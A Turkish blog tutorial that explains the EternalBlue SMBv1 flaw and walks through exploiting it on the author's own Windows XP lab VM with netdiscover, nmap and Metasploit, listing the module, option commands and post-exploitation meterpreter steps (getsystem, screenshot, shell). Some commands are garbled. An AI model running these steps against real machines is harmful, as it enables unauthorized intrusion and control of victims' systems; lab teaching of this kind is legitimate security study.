EternalBlue adlı zafiyet hakkında nasıl kullanıldığını neler olduğunu hangi işletim sisteminde bulunduğunu anlattım. Başlangıçta Amerika Birleşik Devletleri Ulusal Güvenlik Ajansı (NSA) tarafından keşfedilen bir bilgisayar güvenlik açığıdır. EternalBlue, SMBv1 protokolünün bir güvenlik açığına dayanır. Windows işletim sistemlerini etkileyen ve Server Message Block (SMB) protokolü ile ilgili bir güvenlik açığıdır. Bu açık, WannaCry fidye yazılımı (EternalBlue güvenlik açığından yararlanan büyük bir fidye yazılım saldırısıdır) gibi kötü amaçlı yazılımların hızla yayılmasına yol açan bir açık olarak kullandılar.
İçindekiler Tablosu
SBM (Server Message Block) Nedir ?
SMB, ağ dosya paylaşımı ve yazdırma için kullanılan bir iletişim protokolüdür. 445 portunda çalışır. Windows işletim sistemleri, bu protokolü dosya ve yazıcıları paylaşmak için kullanır. SMB hakkında bilgi sahibi olduğumuza göre asıl konumuza geçebiliriz:)
Saldırı Nasıl Gerçekleşir?
Saldırganlar, EternalBlue adlı zafiyet hakkında dicek olursak bunu kullanarak hedef sisteme sızarlar. Bu sızma sırasında saldırganlar hedef sistemin dosya ve kaynaklarını ele geçirebilirler. Ben bu yazımda exploit kullanarak saldırıyı size göstereceğim.
Payload Sistemi
Exploit başarıyla çalıştığında, saldırganlar hedef makineye bir payload (yürütülebilir kod) gönderirler. Bu payload, hedef makinede istedikleri işlemleri gerçekleştirmek için kullanılır.
Hak Edinme
EternalBlue adlı zafiyet hakkında payload hedef sistemin yetki seviyesini yükseltmeye çalışır. Bu, saldırganların hedef sistemi daha fazla kontrol etmelerini sağlar. Kontrol sağladıktan sonraki aşamaları uygulamalı olarak göstereceğim. Şimdi gelelim en güzel yere :)) Sanal makineme windows 7 yükleyerek içine zafiyetli bir makine yükledim. Buradan sonra da zafiyeti sömürmek var.
Yapım aşamaları
EternalBlue adlı zafiyet ‘i kullanmadan önce Win-XP yüklüyorum neden diye soracak olursak çünkü ethernalblue daha çok windows’un eski sürümlerinde daha çok bulunur. Bundan dolayı her zaman yeni sürümlerini kullanıyoruz ve güncellemelerimizi aksaltmıyoruz:)
Açılış ekranı 🙂
Kendi xp sürümünde ip görebiliyorum (Başlat->Denetim Masası-> Ağ ve internet bağlantılarını tıklayın > Ağ Bağlantıları seçeneğini >Yerel Ağ Bağlantısı>Destek
netdiscover -r 10.10.0.129/24 yaparak kendi ağımızda bize bağlı makineleri görüyoruz. Bunu yaparken root olmanız lazım sudo su yazıp kali şifresini girince root olabiliyoruz.
Ve görüyoruz 10.10.0.130 ipsi bize bağlı olan win-xp makinesidir.
Bulduğumuz ipye nmap taraması yapıyoruz
Msfconsole Kullanımı
Bundan sonra msfconsole yapıp msf console ile exploitimizi yazıyoruz. Nmap taramasında aldığım versiyon sonuçlarına göre exploiti internetten araştırıp versiyonuna göre de bulabilirim ama ben bu yazımda bunu yapmayacağım. Bana seçenekleri tek tek sunmasını isteyeceğim.
Geldik bize verilen izinlere ve makinemizin uygunluğuna göre kendi exploitimizi yazmaya :
bunun için search eternalblue yazıp modülleri sıralıyoruz. Modül listesi, hedef işletim sistemi, servisler ve açıklar için uygun olan istismarlar hakkında bilgi sağlar.
Bundan sonra use 1 diyip 1. modülü kullanıyorum.
show options diyip bana seçeneklerimi ve neler yapabileceğim hakkında bilgi vermesini istiyorum.
Bu adımda da aşağıda koyduğum resimde gördüğünüz komut satırında sırasıyla ne yaptığımı, ne işe yaradıklarını hepsini tek tek anlatacağım.
set rhosts 10.10.0.130 = Remote Hosts’ın kısaltmasıdır ve hedef sistemleri belirtmek için kullanırız. Bu komut, Metasploit modüllerinin hedeflenen sistemleri doğru şekilde tanımlamasını sağlar.
set lport 10.10.0.130 4444 = Local Port’un kısaltmasıdır. Metasploit Framework içinde bir hedef sisteme bağlantı kurmak için kullanılan bir komuttur. 4444 yazmamın sebebi bana optionslarda böyle bir seçeneğimin olduğunu ve kullanabileceğimi görmüş olmam. Saldırı işlemi sırasında hedef sisteme bağlantı kurmak için kullanılacak olan port numarasını belirler.
exploit = Yazıp exploitimi çalıştırıyorum.
Exploitim çalıştı ve karşıma meterpreter > çıktı. Bunu görünce exploitimin çalıştığını anlıyorum. Bundan sonrasında da hedef sistem üzerinde istediğim şeyleri elde edebiliyorum.
DİP NOT= Çalışmasaydı eğer başka optionsları deneyecektim ya da internetten başka exploitlere bakacaktım:))
Exploit Elde Ettikten Sonraki Adımlar
Devam ediyorum kullandığım komutları teker teker açıklayacağım :
meterpreter > getsystem= Bir hedef sistemde ayrıcalıklarını yükseltmek için kullanılan bir işlemdir.
meterpreter > sysinfo = Bu komut, hedef sistemin işletim sistemi, işlemci, bellek ve ağ bilgileri gibi temel bilgilerini sunar. Ki şekilde de görüyoruz.
meterpreter > getwd = Hedef sistemin dosya ve dizin yapısını anlamak ve belirli bir işlemi gerçekleştirmek için doğru dizini hedeflemek için kullanışlı olabilir.
meterpreter > screenshot = Hedef sistemde ekran görüntüsünü almamı sağlar ve bana kendi sistemimde aldığı ekran görüntüsünü nereye kaydettiğini de söyler. Ki üstteki Resim-1’in solunda gördüğünüz gibi anlık olarak ekran görüntüsünü aldım.
meterpreter > shell = Bu, hedef sistemde bir komut satırı kabuğu açmamızı sağlar, böylece hedef sistemi daha fazla kontrol edebilir ve işlemler gerçekleştirebilirsiniz. Dikkat ederseniz shell yazdıktan sonra direkt ekranımıza C:\WINDOWS\system32 > bu windows/system32 dizininde olduğumuzu belirtir. Yani, artık hedef sistemin işletim sistemine ait komutları bu dizinde çalıştırabiliriz.
Örneğin : dir yazınca xp sisteminde olan :
- Dizin içindeki dosyaların ve klasörlerin adlarını
- Dosyaların boyutlarını
- Dosyaların tarihlerini ve saatlerini
- Gerekirse, dosya uzantılarını
gösterir.
Bu yazımda EternalBlue adlı zafiyet hakkında anlatacaklarım bu kadar. Okuduğunuz için teşekkürler. Diğer yazılarımıza bakmak isterseniz aşağıya linklerini ekleyeceğim:))
https://hacktorx.com/amass-nedir-ve-nasil-kullanilir/
Leave a Comment